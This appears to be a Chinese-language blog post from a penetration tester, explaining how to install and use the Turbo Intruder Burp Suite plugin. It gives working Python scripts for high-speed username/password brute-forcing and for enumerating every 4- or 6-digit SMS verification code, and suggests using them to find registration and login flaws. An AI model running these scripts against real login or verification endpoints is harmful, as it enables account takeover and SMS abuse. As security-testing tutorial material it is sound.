Turbo Intruder

基础使用总结，把Python代码都记录下，要是有啥骚姿势，求各位师傅交流。

个人感觉超强的一款Burp插件，反正超快

Link: https://github.com/PortSwigger/turbo-intruder/，https://youtu.be/vCpIAsxESFY，https://portswigger.net/research/turbo-intruder-embracing-the-billion-request-attack

视频里有讲解底层原理

Extender -> BApp Store -> Turbo Intruder

Or

手动下载 -> 导入

https://github.com/PortSwigger/turbo-intruder/

我是选择的这种办法，网太垃圾的原因吧，Store里install一直装不上

直接抓取数据包右键发送过去就可以

有上下两块

就拿爆破目录来举例吧

要fuzz的点用%s来顶上

选择爆破点 -> 加载字典 -> Attack

要看和普通burp里的intruder的速度差距自己试试就知道了哈哈

既然这么快，那么挖掘任意用户注册和登录是不是很爽呢，以后补挖掘案例(2020.11.24，12:14)

想要大大提升速度，就把pipeline设置成True

pipeline学过http request smuggling的应该都知道是啥了吧(手动滑稽)

from urllib import quote

def password_brute(target,engine):
 for word in open('F:/Tools/Dict/fuzzDicts-master/top10.txt'):
       engine.queue(target.req, quote(word.rstrip()))

def user_brute(target,engine):
 for word in open('F:/Tools/Dict/fuzzDicts-master/top10.txt'):
       engine.queue(target.req, quote(word.rstrip()))
def user_password_brute(target, engine):
 for password in open('F:/Tools/Dict/fuzzDicts-master/top10.txt'):
   for user in open('F:/Tools/Dict/fuzzDicts-master/top10.txt'):
          engine.queue(target.req, [quote(user.rstrip()),quote(password.rstrip())])

def queueRequests(target, wordlists):
   engine = RequestEngine(endpoint=target.endpoint,
           concurrentConnections=5,
           requestsPerConnection=100,
           pipeline=True
           )
   #user_brute(target,engine)
   #password_brute(target,engine)
   user_password_brute(target,engine)

def handleResponse(req, interesting):
# currently available attributes are req.status, req.wordcount, req.length and req.response
   if req.status == 200:
      table.add(req)

if条件 可以自己更改

需要用哪个就用哪个，不需要就注释

最后的数字假如是4位验证码就传4，6就是6

from itertools import product

def brute_veify_code(target, engine, length):
   pattern = '1234567890'
   for i in list(product(pattern, repeat=length)):
        code =  ''.join(i)
        engine.queue(target.req, code)

def queueRequests(target, wordlists):
   engine = RequestEngine(endpoint=target.endpoint,
           concurrentConnections=30,
           requestsPerConnection=100,
           pipeline=True
           )
   brute_veify_code(target, engine, 6)

def handleResponse(req, interesting):
# currently available attributes are req.status, req.wordcount, req.length and req.response
 if 'error' not in req.response:
      table.add(req)

不做演示了

这个就直接实战吧 哈哈

这里有个注意点concurrentConnections和for循环的次数，大家自己尝试哈哈

垃圾接码平台，最后还是用的自己的手机号测试的 淦

写个笔记还浪费我的短信费 哭了呜呜